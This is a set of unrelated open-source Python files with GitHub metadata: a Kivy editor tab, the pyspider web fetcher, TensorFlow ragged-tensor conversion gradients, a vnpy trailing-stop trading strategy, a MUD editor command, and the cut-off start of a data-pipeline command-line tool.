label = ObjectProperty(None)
"""Label to place the name of the tab"""
def __init__(self, **kwargs):
"""Calls super's __init__ and binds texture_size of
:py:attr:`.label` to :py:meth:`.on_label_textture_size`."""
super(EditorTab, self).__init__(**kwargs)
self.label.bind(texture_size=self.on_label_texture_size)
self.saved = True
"""Indicates if the contents of the tab were already saved (after a change).
True = saved
False = unsaved
"""
def close_tab_question(self, widget, value):
"""Close the tab after using a confirmation dialog, if the answer was 'yes'.
:param widget: Widget on which the event ocurred \
(a :py:class:`confirmationdialog.confirmationdialog.ConfirmationDialog`).
:param value: Value after the change (the value of widget.answered).
"""
if value:
self.close_editor_tab(saved=True)
def close_editor_tab(self, saved=False):
"""Close this :py:class:`.EditorTab`.
Determines to which tab to move (if some tab is open) when this one is
closed.
"""
if self.saved == False and saved == False:
description = 'This tab has unsaved changes'
question = 'Do you want to close it without saving?'
confirmation_dialog = ConfirmationDialog(description,
question)
confirmation_dialog.open()
confirmation_dialog.bind(answered=self.close_tab_question)
else:
parent_panel = self.parent.tabbed_panel
# Save the position to change tabs
# in theory to the one on the left
switch_index = parent_panel.tab_list.index(self)
# See if the tab was the current one
was_current = False or (self is parent_panel.current_tab)
parent_panel.remove_widget(self)
self.content.opacity = 0
tab_list = parent_panel.tab_list
# Find out if it's possible to change to other tab,
# then change to it
tab_list_len = len(parent_panel.tab_list)
if(tab_list_len > 0):
# It's not necessary if the tab wasn't the 'current_tab'
if was_current:
#Calculate position to switch to
if not switch_index == tab_list_len:
switch_index = switch_index % tab_list_len
else:
switch_index = tab_list_len - 1
parent_panel.switch_to(parent_panel.tab_list[switch_index])
# Tell the EditorContainer to remove the footer if there are no more
# open tabs
parent_panel.footer_visibility()
def change_tab_name(self, name=None):
"""Change the name of this :py:class:`.EditorTab`. The name is what's
displayed in the tab header (that is, this :py:class:`.EditorTab`)."""
if name is not None:
self.label.text = name
def on_label_texture_size(self, widget, value):
"""Manage event when texture_size changes in :py:attr:`.label`.
The width of the tab is changed accordingly to fit the tab name.
:param widget: Widget on which the event ocurred (:py:attr:`.label`).
:param value: Value of texture_size after it changed.
"""
double_padding = 2 * self.label.padding_x
self.label.width = self.label.texture_size[0] + double_padding
self.width = self.close_button.width + self.label.width
|
{
"content_hash": "578380cd7f0bc3d16a39df8ce1b155ed",
"timestamp": "",
"source": "github",
"line_count": 630,
"max_line_length": 135,
"avg_line_length": 38.7,
"alnum_prop": 0.5503055658094418,
"repo_name": "Errantgod/azaharTEA",
"id": "43728d005d0219cb673470a9a0cdb72538f580b0",
"size": "24381",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "editorcontainer/editorcontainer.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "77665"
}
],
"symlink_target": ""
}
|
import time
import json
import Queue
import logging
import threading
import cookie_utils
import tornado.ioloop
import tornado.httputil
import tornado.httpclient
from tornado.curl_httpclient import CurlAsyncHTTPClient
from tornado.simple_httpclient import SimpleAsyncHTTPClient
from pyspider.libs import dataurl, counter
logger = logging.getLogger('fetcher')
class MyCurlAsyncHTTPClient(CurlAsyncHTTPClient):
def free_size(self):
return len(self._free_list)
def size(self):
return len(self._curls) - self.free_size()
class MySimpleAsyncHTTPClient(SimpleAsyncHTTPClient):
def free_size(self):
return self.max_clients - self.size()
def size(self):
return len(self.active)
fetcher_output = {
"status_code": int,
"orig_url": str,
"url": str,
"headers": dict,
"content": str,
"cookies": dict,
}
class Fetcher(object):
user_agent = "pyspider/master (+http://pyspider.org/)"
default_options = {
'method': 'GET',
'headers': {},
'timeout': 120,
}
phantomjs_proxy = None
def __init__(self, inqueue, outqueue, poolsize=10, proxy=None, async=True):
self.inqueue = inqueue
self.outqueue = outqueue
self.poolsize = poolsize
self._running = False
self._quit = False
self.proxy = proxy
self.async = async
if async:
self.http_client = MyCurlAsyncHTTPClient(max_clients=self.poolsize)
else:
self.http_client = tornado.httpclient.HTTPClient(MyCurlAsyncHTTPClient, max_clients=self.poolsize)
self._cnt = {
'5m': counter.CounterManager(
lambda : counter.TimebaseAverageWindowCounter(30, 10)),
'1h': counter.CounterManager(
lambda : counter.TimebaseAverageWindowCounter(60, 60)),
}
def send_result(self, type, task, result):
"""type in ('data', 'http')"""
if self.outqueue:
try:
self.outqueue.put((task, result))
except Exception, e:
logger.exception(e)
def fetch(self, task, callback=None):
url = task.get('url', 'data:,')
if callback is None:
callback = self.send_result
if url.startswith('data:'):
return self.data_fetch(url, task, callback)
elif task.get('fetch', {}).get('fetch_type') in ('js', 'phantomjs'):
return self.phantomjs_fetch(url, task, callback)
else:
return self.http_fetch(url, task, callback)
def sync_fetch(self, task):
wait_result = threading.Condition()
_result = {}
def callback(type, task, result):
wait_result.acquire()
_result['type'] = type
_result['task'] = task
_result['result'] = result
wait_result.notify()
wait_result.release()
self.fetch(task, callback=callback)
wait_result.acquire()
while 'result' not in _result:
wait_result.wait()
wait_result.release()
return _result['result']
def data_fetch(self, url, task, callback):
self.on_fetch('data', task)
result = {}
result['orig_url'] = url
result['content'] = dataurl.decode(url)
result['headers'] = {}
result['status_code'] = 200
result['url'] = url
result['cookies'] = {}
result['time'] = 0
result['save'] = task.get('fetch', {}).get('save')
if len(result['content']) < 70:
logger.info("[200] %s 0s", url)
else:
logger.info("[200] data:,%s...[content:%d] 0s", result['content'][:70], len(result['content']))
callback('data', task, result)
self.on_result('data', task, result)
return task, result
allowed_options = ['method', 'data', 'timeout', 'allow_redirects', 'cookies']
def http_fetch(self, url, task, callback):
self.on_fetch('http', task)
fetch = dict(self.default_options)
fetch.setdefault('url', url)
fetch.setdefault('headers', {})
fetch.setdefault('allow_redirects', True)
fetch.setdefault('use_gzip', True)
fetch['headers'].setdefault('User-Agent', self.user_agent)
task_fetch = task.get('fetch', {})
for each in self.allowed_options:
if each in task_fetch:
fetch[each] = task_fetch[each]
fetch['headers'].update(task_fetch.get('headers', {}))
track_headers = task.get('track', {}).get('fetch', {}).get('headers', {})
#proxy
if 'proxy' in task_fetch:
if isinstance(task_fetch['proxy'], basestring):
fetch['proxy_host'] = task_fetch['proxy'].split(":")[0]
fetch['proxy_port'] = int(task_fetch['proxy'].split(":")[1])
elif self.proxy and task_fetch.get('proxy', True):
fetch['proxy_host'] = self.proxy.split(":")[0]
fetch['proxy_port'] = int(self.proxy.split(":")[1])
#etag
if task_fetch.get('etag', True):
_t = task_fetch.get('etag') if isinstance(task_fetch.get('etag'), basestring) \
else track_headers.get('etag')
if _t:
fetch['headers'].setdefault('If-None-Match', _t)
#last modifed
if task_fetch.get('last_modified', True):
_t = task_fetch.get('last_modifed') \
if isinstance(task_fetch.get('last_modifed'), basestring) \
else track_headers.get('last-modified')
if _t:
fetch['headers'].setdefault('If-Modifed-Since', _t)
#fix for tornado request obj
if 'allow_redirects' in fetch:
fetch['follow_redirects'] = fetch['allow_redirects']
del fetch['allow_redirects']
if 'timeout' in fetch:
fetch['connect_timeout'] = fetch['timeout']
fetch['request_timeout'] = fetch['timeout']
del fetch['timeout']
if 'data' in fetch:
fetch['body'] = fetch['data']
del fetch['data']
cookie = None
if 'cookies' in fetch:
cookie = fetch['cookies']
del fetch['cookies']
def handle_response(response):
response.headers = final_headers
session.extract_cookies_to_jar(request, cookie_headers)
if response.error and not isinstance(response.error, tornado.httpclient.HTTPError):
result = {
'status_code': 599,
'error': "%r" % response.error,
'content': "",
'time': time.time() - start_time,
'orig_url': url,
'url': url,
}
callback('http', task, result)
self.on_result('http', task, result)
return task, result
result = {}
result['orig_url'] = url
result['content'] = response.body or ''
result['headers'] = dict(response.headers)
result['status_code'] = response.code
result['url'] = response.effective_url or url
result['cookies'] = session.to_dict()
result['time'] = time.time() - start_time
result['save'] = task_fetch.get('save')
if 200 <= response.code < 300:
logger.info("[%d] %s %.2fs", response.code, url, result['time'])
else:
logger.warning("[%d] %s %.2fs", response.code, url, result['time'])
callback('http', task, result)
self.on_result('http', task, result)
return task, result
def header_callback(line):
line = line.strip()
if line.startswith("HTTP/"):
final_headers.clear()
return
if not line:
return
final_headers.parse_line(line)
cookie_headers.parse_line(line)
start_time = time.time()
session = cookie_utils.CookieSession()
cookie_headers = tornado.httputil.HTTPHeaders()
final_headers = tornado.httputil.HTTPHeaders()
try:
request = tornado.httpclient.HTTPRequest(header_callback=header_callback, **fetch)
if cookie:
session.update(cookie)
if 'Cookie' in request.headers:
del request.headers['Cookie']
request.headers['Cookie'] = session.get_cookie_header(request)
if self.async:
response = self.http_client.fetch(request, handle_response)
else:
return handle_response(self.http_client.fetch(request))
except tornado.httpclient.HTTPError as e:
return handle_response(e.response)
except Exception as e:
raise
result = {
'status_code': 599,
'error': '%r' % e,
'content': "",
'time': time.time() - start_time,
'orig_url': url,
'url': url,
}
logger.error("[599] %s, %r %.2fs", url, e, result['time'])
callback('http', task, result)
self.on_result('http', task, result)
return task, result
phantomjs_adding_options = ['js_run_at', 'js_script', 'load_images']
def phantomjs_fetch(self, url, task, callback):
self.on_fetch('phantomjs', task)
if not self.phantomjs_proxy:
result = {
"orig_url": url,
"content": "phantomjs is not enabled.",
"headers": {},
"status_code": 501,
"url": url,
"cookies": {},
"time": 0,
"save": task.get('fetch', {}).get('save')
}
logger.warning("[501] %s 0s", url)
callback('http', task, result)
self.on_result('http', task, result)
return task, result
request_conf = {
'follow_redirects': False
}
fetch = dict(self.default_options)
fetch.setdefault('url', url)
fetch.setdefault('headers', {})
task_fetch = task.get('fetch', {})
fetch.update(task_fetch)
if 'timeout' in fetch:
request_conf['connect_timeout'] = fetch['timeout']
request_conf['request_timeout'] = fetch['timeout']
fetch['headers'].setdefault('User-Agent', self.user_agent)
start_time = time.time()
def handle_response(response):
if not response:
result = {
'status_code': 599,
'error': "599 Timeout error",
'content': "",
'time': time.time() - start_time,
'orig_url': url,
'url': url,
}
else:
try:
result = json.loads(response.body)
except Exception as e:
result = {
'status_code': 599,
'error': '%r' % e,
'content': '',
'time': time.time() - start_time,
'orig_url': url,
'url': url,
}
if result.get('status_code', 200):
logger.info("[%d] %s %.2fs", result['status_code'], url, result['time'])
else:
logger.exception("[%d] %s, %r %.2fs", result['status_code'],
url, result['content'], result['time'])
callback('phantomjs', task, result)
self.on_result('phantomjs', task, result)
return task, result
try:
request = tornado.httpclient.HTTPRequest(
url="%s" % self.phantomjs_proxy, method="POST",
body=json.dumps(fetch), **request_conf)
if self.async:
response = self.http_client.fetch(request, handle_response)
else:
return handle_response(self.http_client.fetch(request))
except tornado.httpclient.HTTPError as e:
return handle_response(e.response)
except Exception as e:
result = {
'status_code': 599,
'error': "%r" % e,
'content': '',
'time': time.time() - start_time,
'orig_url': url,
'url': url,
}
logger.error("[599] %s, %r %.2fs", url, e, result['time'])
callback('phantomjs', task, result)
self.on_result('phantomjs', task, result)
return task, result
def run(self):
def queue_loop():
if not self.outqueue or not self.inqueue:
return
while not self._quit:
try:
if self.outqueue.full():
break
if self.http_client.free_size() <= 0:
break
task = self.inqueue.get_nowait()
self.fetch(task)
except Queue.Empty:
break
except KeyboardInterrupt:
break
except Exception, e:
logger.exception(e)
break
tornado.ioloop.PeriodicCallback(queue_loop, 100).start()
self._running = True
try:
tornado.ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
pass
logger.info("fetcher exiting...")
def size(self):
return self.http_client.size()
def quit(self):
self._running = False
self._quit = True
tornado.ioloop.IOLoop.instance().stop()
def xmlrpc_run(self, port=24444, bind='127.0.0.1', logRequests=False):
import umsgpack
from SimpleXMLRPCServer import SimpleXMLRPCServer
from xmlrpclib import Binary
server = SimpleXMLRPCServer((bind, port), allow_none=True, logRequests=logRequests)
server.register_introspection_functions()
server.register_multicall_functions()
server.register_function(self.quit, '_quit')
server.register_function(self.size)
def sync_fetch(task):
result = self.sync_fetch(task)
result = Binary(umsgpack.packb(result))
return result
server.register_function(sync_fetch, 'fetch')
def dump_counter(_time, _type):
return self._cnt[_time].to_dict(_type)
server.register_function(dump_counter, 'counter')
server.timeout = 0.5
while not self._quit:
server.handle_request()
server.server_close()
def on_fetch(self, type, task):
"""type in ('data', 'http')"""
pass
def on_result(self, type, task, result):
"""type in ('data', 'http')"""
status_code = result.get('status_code', 599)
if status_code != 599:
status_code = (int(status_code) / 100 * 100)
self._cnt['5m'].event((task.get('project'), status_code), +1)
self._cnt['1h'].event((task.get('project'), status_code), +1)
if type == 'http' and result.get('time'):
content_len = len(result.get('content', ''))
self._cnt['5m'].event((task.get('project'), 'speed'), float(content_len)/result.get('time'))
self._cnt['1h'].event((task.get('project'), 'speed'), float(content_len)/result.get('time'))
self._cnt['5m'].event((task.get('project'), 'time'), result.get('time'))
self._cnt['1h'].event((task.get('project'), 'time'), result.get('time'))
|
{
"content_hash": "f7757da07afd7d33482346640647c7b6",
"timestamp": "",
"source": "github",
"line_count": 421,
"max_line_length": 110,
"avg_line_length": 38.32541567695962,
"alnum_prop": 0.5089556863960335,
"repo_name": "jorik041/pyspider",
"id": "9e1564886e344b63aa022863c5aac83c9b2ec56f",
"size": "16320",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "pyspider/fetcher/tornado_fetcher.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "20906"
},
{
"name": "HTML",
"bytes": "19066"
},
{
"name": "JavaScript",
"bytes": "32832"
},
{
"name": "Python",
"bytes": "260158"
}
],
"symlink_target": ""
}
|
"""Ops to convert between RaggedTensors and other tensor types."""
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import indexed_slices
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_ragged_conversion_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.ragged import ragged_tensor
def from_tensor(tensor,
lengths=None,
padding=None,
ragged_rank=1,
row_splits_dtype=dtypes.int64,
name=None):
if ragged_tensor.is_ragged(tensor):
return tensor
else:
return ragged_tensor.RaggedTensor.from_tensor(
tensor,
lengths=lengths,
padding=padding,
ragged_rank=ragged_rank,
row_splits_dtype=row_splits_dtype,
name=name)
def to_tensor(rt_input, default_value=None, name=None):
if ragged_tensor.is_ragged(rt_input):
return rt_input.to_tensor(default_value, name)
else:
return rt_input
def ragged_to_dense(rt_input, default_value=None, shape=None):
"""Create a dense tensor from a ragged tensor."""
return rt_input.to_tensor(default_value=default_value, shape=shape)
@ops.RegisterGradient("RaggedTensorToTensor")
def _ragged_tensor_to_tensor_grad(op, grad):
"""Gradient for RaggedToTensor op."""
# Extract inputs from the op.
flat_values = op.inputs[1]
default_value = op.inputs[2]
row_partition_tensors = op.inputs[3:]
row_partition_types = op.get_attr("row_partition_types")
flat_value_shape = array_ops.shape(flat_values)
ragged_rank = sum(
1 for typ in row_partition_types if typ != b"FIRST_DIM_SIZE")
# Create two tensors that correspond 1:1 with grad (and op.output):
# * indices[i1...iN] is the index in `flat_values` of the value used to
# populate output[i1...iN] (if the value came from `flat_values`) or
# -1 (if the value came from `default_value`).
# * mask[i1...iN] is true if output[i1...iN] came from `flat_values`, or
# false if it came from `default_value`.
indices = gen_ragged_conversion_ops.ragged_tensor_to_tensor(
shape=array_ops.shape(grad)[:1 + ragged_rank],
values=math_ops.range(flat_value_shape[0]),
default_value=-1,
row_partition_types=row_partition_types,
row_partition_tensors=row_partition_tensors)
mask = math_ops.not_equal(indices, -1)
# Select out the gradients & indices that came from `flat_values`, and use
# those to construct the gradient for `flat_values` (as an IndexedSlices).
values_grad = indexed_slices.IndexedSlices(
values=array_ops.boolean_mask(grad, mask),
indices=array_ops.boolean_mask(indices, mask),
dense_shape=flat_value_shape)
# Select out the gradients that came from `default_value`, and sum them to
# get the gradient for the default. Note that the default_value may have
# been broadcast as part of the RaggedTensorToTensor operation, so we also
# need to reduce any dimensions that might have been broadcast.
default_grads = array_ops.boolean_mask(grad, ~mask)
dims_to_reduce = math_ops.range(
array_ops.rank(default_grads) -
_rank_ignoring_leading_dims_with_size_1(default_value))
default_grad = math_ops.reduce_sum(default_grads, axis=dims_to_reduce)
# Restore any leading dims with size one.
default_grad = array_ops.reshape(default_grad, array_ops.shape(default_value))
return ([None, values_grad, default_grad] +
[None for _ in row_partition_tensors])
def _rank_ignoring_leading_dims_with_size_1(value):
"""Returns `rank(value)`, ignoring any leading dimensions with size 1."""
# Compute the result using static shape, if possible.
if value.shape.rank is not None:
ndims = value.shape.rank
for dim in value.shape.dims:
if dim.value == 1:
ndims -= 1
elif dim.value is None:
ndims = None # Can't compute the result using static shape.
break
else:
break
if ndims is not None:
return ndims
# Otherwise, we need to compute the result dynamically. The math we use to
# do this is a bit round-about, so here's an example to illustrate:
# shape = [1, 1, 3, 5, 1, 4] # shape(value)
# dim_is_one = [1, 1, 0, 0, 1, 0] # equal(shape, 1)
# leading_ones = [1, 1, 0, 0, 0, 0] # cumprod(dim_is_one)
# num_leading_ones = 2 # reduce_sum(leading_ones)
# result = 4 # rank(value) - num_leading_ones
shape = array_ops.shape(value)
dim_is_one = math_ops.cast(math_ops.equal(shape, 1), dtypes.int32)
leading_ones = math_ops.cumprod(dim_is_one)
num_leading_ones = math_ops.reduce_sum(leading_ones)
return array_ops.rank(value) - num_leading_ones
def to_sparse(rt_input, name=None):
return rt_input.to_sparse(name)
def from_sparse(st_input, name=None):
return ragged_tensor.RaggedTensor.from_sparse(st_input, name)
@ops.RegisterGradient("RaggedTensorFromVariant")
def _ragged_tensor_from_variant_grad(op, *grads):
"""Gradient for RaggedTensorFromVariant op."""
variant_rank = op.inputs[0].shape.rank
if variant_rank == 0:
batched_input = False
elif variant_rank == 1:
batched_input = True
elif variant_rank is None:
batched_input = (op.get_attr("output_ragged_rank") > 0)
else:
# TODO(edloper): Add a batch_dims argument to RaggedTensorToVariant, so
# we can support this.
raise ValueError("Unable to compute gradient: RaggedTensorToVariant "
"can currently only generate 0D or 1D output.")
return [
gen_ragged_conversion_ops.ragged_tensor_to_variant(
rt_nested_splits=op.outputs[:-1],
rt_dense_values=grads[-1],
batched_input=batched_input)
]
@ops.RegisterGradient("RaggedTensorToVariant")
def _ragged_tensor_to_variant_grad(op, encoded_ragged_grad):
"""Gradient for RaggedTensorToVariant op."""
dense_values = op.inputs[-1]
ragged_rank = len(op.inputs) - 1
row_splits = 0 if ragged_rank == 0 else op.inputs[0]
values_grad = gen_ragged_conversion_ops.ragged_tensor_to_variant_gradient(
encoded_ragged_grad=encoded_ragged_grad,
row_splits=row_splits,
dense_values_shape=array_ops.shape(dense_values),
Tvalues=op.inputs[-1].dtype)
result = [None] * ragged_rank + [values_grad]
return result
|
{
"content_hash": "8d302eaddbd4fee981cb7087dc18a63f",
"timestamp": "",
"source": "github",
"line_count": 166,
"max_line_length": 80,
"avg_line_length": 38.51204819277108,
"alnum_prop": 0.6788675113405287,
"repo_name": "gautam1858/tensorflow",
"id": "e71f5cad7929fc034eaa2bad2f6b81110c36b1ed",
"size": "7082",
"binary": false,
"copies": "12",
"ref": "refs/heads/master",
"path": "tensorflow/python/ops/ragged/ragged_conversion_ops.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "47492"
},
{
"name": "C",
"bytes": "1129549"
},
{
"name": "C#",
"bytes": "13496"
},
{
"name": "C++",
"bytes": "116904214"
},
{
"name": "CMake",
"bytes": "165809"
},
{
"name": "Cython",
"bytes": "5003"
},
{
"name": "Dockerfile",
"bytes": "341994"
},
{
"name": "Go",
"bytes": "2052513"
},
{
"name": "HTML",
"bytes": "4686483"
},
{
"name": "Java",
"bytes": "1053827"
},
{
"name": "JavaScript",
"bytes": "5772"
},
{
"name": "Jupyter Notebook",
"bytes": "787371"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "MLIR",
"bytes": "9549263"
},
{
"name": "Makefile",
"bytes": "2760"
},
{
"name": "Objective-C",
"bytes": "180638"
},
{
"name": "Objective-C++",
"bytes": "295149"
},
{
"name": "Pawn",
"bytes": "5336"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "43775271"
},
{
"name": "Roff",
"bytes": "5034"
},
{
"name": "Ruby",
"bytes": "7854"
},
{
"name": "Shell",
"bytes": "566970"
},
{
"name": "Smarty",
"bytes": "89664"
},
{
"name": "SourcePawn",
"bytes": "8509"
},
{
"name": "Starlark",
"bytes": "6897556"
},
{
"name": "Swift",
"bytes": "78435"
},
{
"name": "Vim Snippet",
"bytes": "58"
}
],
"symlink_target": ""
}
|
"""
移动止损策略:对从策略进行移动止损操作
请按命名规则在策略配置文件中配置
"""
from __future__ import division
from vnpy.app.cta_strategy.ctaTemplatePatch import CtaTemplatePatch
import copy
########################################################################
class TrailingStopStrategy(CtaTemplatePatch):
"""移动止损策略"""
className = 'TrailingStopStrategy'
author = u'renxg'
# 止损变量
intraTradeHigh = 0
intraTradeLow = 0
intraTradeHighDateTime = None
intraTradeLowDateTime = None
longStop = 0
shortStop = 0
stopOrderList = None
exitOnTopRtnPips = 0.008
halfTime = 60
slaveStrategy = None
slaveTradeIndex = 0 #区分从策略持仓,以此来感知仓位变换
# 参数列表,保存了参数的名称
parameters = CtaTemplatePatch.parameters + ['exitOnTopRtnPips', 'halfTime']
# 变量列表,保存了变量的名称
variables = CtaTemplatePatch.variables + [
'intraTradeHigh', 'intraTradeLow', 'longStop', 'shortStop',
'slaveTradeIndex', 'intraTradeHighDateTime', 'intraTradeLowDateTime'
]
#----------------------------------------------------------------------
# ----------------------------------------------------------------------
def __init__(self, cta_engine, strategy_name, vt_symbol, setting):
""""""
super().__init__(cta_engine, strategy_name, vt_symbol, setting)
self.stopOrderList = []
# self.tag = (hash(self.name) % 1e+5) * 1e-10
# self.write_log( u'Tag: {:.10f}'.format(self.tag))
#----------------------------------------------------------------------
def on_start(self):
"""启动策略(必须由用户继承实现)"""
super().on_start()
# 重设止损单
if self.trading:
if self.getSlaveStrategy():
if abs(self.slaveStrategy.pos):
self.setStopOrder()
#----------------------------------------------------------------------
def on_tick(self, tick):
"""收到行情TICK推送(必须由用户继承实现)"""
super().on_tick(tick)
if self.trading:
if self.getSlaveStrategy():
#设置从策略持有期内的最高价、最低价
if abs(
self.slaveStrategy.pos
) and self.slaveStrategy.tradeIndex == self.slaveTradeIndex:
# 计算持有期内的最高价
self.intraTradeHigh = max(self.intraTradeHigh,
tick.lastPrice)
self.intraTradeLow = min(self.intraTradeLow,
tick.lastPrice)
if self.intraTradeHigh == tick.lastPrice:
self.intraTradeHighDateTime = tick.datetime
if self.intraTradeLow == tick.lastPrice:
self.intraTradeLowDateTime = tick.datetime
else:
#重置
self.intraTradeHigh = tick.lastPrice
self.intraTradeLow = tick.lastPrice
self.slaveTradeIndex = self.slaveStrategy.tradeIndex
self.intraTradeHighDateTime = tick.datetime
self.intraTradeLowDateTime = tick.datetime
#----------------------------------------------------------------------
def on_bar(self, bar):
'''处理分钟数据'''
super().on_bar(bar)
if self.trading:
if self.getSlaveStrategy():
#设置从策略持有期内的最高价、最低价
if abs(
self.slaveStrategy.pos
) and self.slaveStrategy.tradeIndex == self.slaveTradeIndex:
# 计算持有期内的最高价
self.intraTradeHigh = max(self.intraTradeHigh, bar.high_price)
self.intraTradeLow = min(self.intraTradeLow, bar.low_price)
if self.intraTradeHigh == bar.high_price:
self.intraTradeHighDateTime = bar.datetime
if self.intraTradeLow == bar.low_price:
self.intraTradeLowDateTime = bar.datetime
else:
#重置
self.intraTradeHigh = bar.high_price
self.intraTradeLow = bar.low_price
self.slaveTradeIndex = self.slaveStrategy.tradeIndex
self.intraTradeHighDateTime = bar.datetime
self.intraTradeLowDateTime = bar.datetime
if abs(self.slaveStrategy.pos):
self.setStopOrder()
#----------------------------------------------------------------------
def onXminBar(self, bar):
"""收到K线推送"""
super(TrailingStopStrategy, self).onXminBar(bar)
if not self.trading:
return
if not self.am.inited:
return
#----------------------------------------------------------------------
def on_stop(self):
"""停止策略(必须由用户继承实现)"""
#如果已经设置移动止损单,撤消
for orderID in self.stopOrderList:
self.slaveStrategy.cancel_order(orderID)
self.stopOrderList = []
super().on_stop()
#----------------------------------------------------------------------
def getSlaveStrategy(self):
'''取被保护策略'''
if not self.slaveStrategy:
lockName = self.strategy_name.split('_Cover')[0]
if lockName in self.cta_engine.strategyDict:
self.slaveStrategy = self.cta_engine.strategyDict[lockName]
else:
self.write_log(u'策略 %s 没找到' % lockName)
return self.slaveStrategy
pass
#----------------------------------------------------------------------
def setStopOrder(self):
"""移动止损"""
pos = self.slaveStrategy.pos
trading = self.slaveStrategy.trading
if trading:
#如果已经设置移动止损单,撤消
for orderID in self.stopOrderList:
self.slaveStrategy.cancel_order(orderID)
self.stopOrderList = []
# 跟随止损
if self.exitOnTopRtnPips > 0:
halfT = self.halfTime
# 持有多头仓位
if pos > 0:
if self.intraTradeHighDateTime:
pips = self.exitOnTopRtnPips * 0.8**(
(self.lastDatetime -
self.intraTradeHighDateTime).seconds / 60 / halfT)
longStop = int(self.intraTradeHigh * (1 - pips))
else:
longStop = int(
self.intraTradeHigh * (1 - self.exitOnTopRtnPips))
# 发出本地止损委托,并且把委托号记录下来,用于后续撤单
self.stopOrderList = self.slaveStrategy.sell(
longStop, abs(pos), stop=True)
self.longStop = longStop
# 持有空头仓位
elif pos < 0:
# 计算空头移动止损
if self.intraTradeLowDateTime:
pips = self.exitOnTopRtnPips * 0.8**(
(self.lastDatetime -
self.intraTradeLowDateTime).seconds / 60 / halfT)
shortStop = int(self.intraTradeLow * (1 + pips))
else:
shortStop = int(
self.intraTradeLow * (1 + self.exitOnTopRtnPips))
self.stopOrderList = self.slaveStrategy.cover(
shortStop, abs(pos), stop=True)
self.shortStop = shortStop
else:
#reset stop price
self.longStop = 0
self.shortStop = 0
|
{
"content_hash": "cf6eacb999165a191ed3d5c7edc31e75",
"timestamp": "",
"source": "github",
"line_count": 202,
"max_line_length": 82,
"avg_line_length": 37.381188118811885,
"alnum_prop": 0.46656072043437957,
"repo_name": "bigdig/vnpy",
"id": "6ed3a91345fb87f25b70451150d56a276e0855ac",
"size": "8173",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "vnpy/app/cta_strategy/strategies/strategyTrailingStop.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "390"
},
{
"name": "C",
"bytes": "1652953"
},
{
"name": "C++",
"bytes": "13737810"
},
{
"name": "Objective-C",
"bytes": "1200"
},
{
"name": "Python",
"bytes": "2979947"
},
{
"name": "Shell",
"bytes": "6050"
}
],
"symlink_target": ""
}
|
"""Package contenant la commande 'pedit'."""
from primaires.interpreteur.commande.commande import Commande
class CmdPedit(Commande):
"""Commande 'pedit'"""
def __init__(self):
"""Constructeur de la commande"""
Commande.__init__(self, "pedit", "pedit")
self.groupe = "administrateur"
self.schema = "<ident>"
self.nom_categorie = "batisseur"
self.aide_courte = "ouvre l'éditeur de PNJ"
self.aide_longue = \
"Cette commande ouvre l'éditeur de PNJ permettant de créer et " \
"éditer des prototypes de PNJ. Notez bien que vous n'éditez " \
"pas directement le PNJ mais bien son prototype."
def interpreter(self, personnage, dic_masques):
"""Méthode d'interprétation de commande"""
ident_pnj = dic_masques["ident"].ident
if ident_pnj in type(self).importeur.pnj.prototypes:
prototype = type(self).importeur.pnj.prototypes[ident_pnj]
else:
prototype = type(self).importeur.pnj.creer_prototype(ident_pnj)
editeur = type(self).importeur.interpreteur.construire_editeur(
"pedit", personnage, prototype)
personnage.contextes.ajouter(editeur)
editeur.actualiser()
|
{
"content_hash": "00be591929b74b8bdd8d29f73512351c",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 77,
"avg_line_length": 39.9375,
"alnum_prop": 0.622848200312989,
"repo_name": "vlegoff/tsunami",
"id": "1460948e28a22a847192c273eebe7fd1806c9b80",
"size": "2855",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/primaires/pnj/commandes/pedit/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "7930908"
},
{
"name": "Ruby",
"bytes": "373"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
import logging
import argparse
import unittest
import os
# Set up logger for the sub-commands to use.
# Note that this setup must occur before the other modules are imported.
# Code stub courtesy of http://stackoverflow.com/questions/7621897/python-logging-module-globally
log_formatter = logging.Formatter(
fmt="[%(levelname)s] %(asctime)s (%(module)s:%(lineno)d): %(message)s")
log_handler = logging.StreamHandler()
log_handler.setFormatter(log_formatter)
data_logger = logging.getLogger('data')
data_logger.setLevel(logging.INFO)
data_logger.addHandler(log_handler)
data_logger.propagate = False
from models import create_tables, init_database
from fetch import queries, results, results_content, histories, stack_overflow_questions, issues,\
issue_comments, issue_events, slant_topics, slant_pros_and_cons
from import_ import stackoverflow
from compute import code, npm_packages, post_tags, python_snippets, tasks
from migrate import run_migration
from dump import node_post_stats, package_top_queries, pattern_snippets, popular_tag_post_stats,\
slant_community_pros_and_cons
COMMANDS = {
'fetch': {
'description': "Fetch data from the web.",
'module_help': "Type of data to fetch.",
'modules': [
histories, queries, results, results_content, stack_overflow_questions, issues,
issue_comments, issue_events, slant_topics, slant_pros_and_cons
],
},
'import': {
'description': "Import data from a local data source.",
'module_help': "Type of data to import.",
'modules': [stackoverflow],
},
'compute': {
'description': "Compute derived fields from existing data.",
'module_help': "Type of data to compute.",
'modules': [code, npm_packages, post_tags, python_snippets, tasks],
},
'migrate': {
'description':
"Manage database migrations. (Should only be necessary if you initialized " +
"your database and then the model files were updated.)",
'module_help': "Migration operation.",
'modules': [run_migration],
},
'dump': {
'description': "Dump data to a JSON file.",
'module_help': "Type of data to dump.",
'modules': [
node_post_stats, pattern_snippets, package_top_queries, popular_tag_post_stats,
slant_community_pros_and_cons
],
},
}
def run_tests(*args, **kwargs):
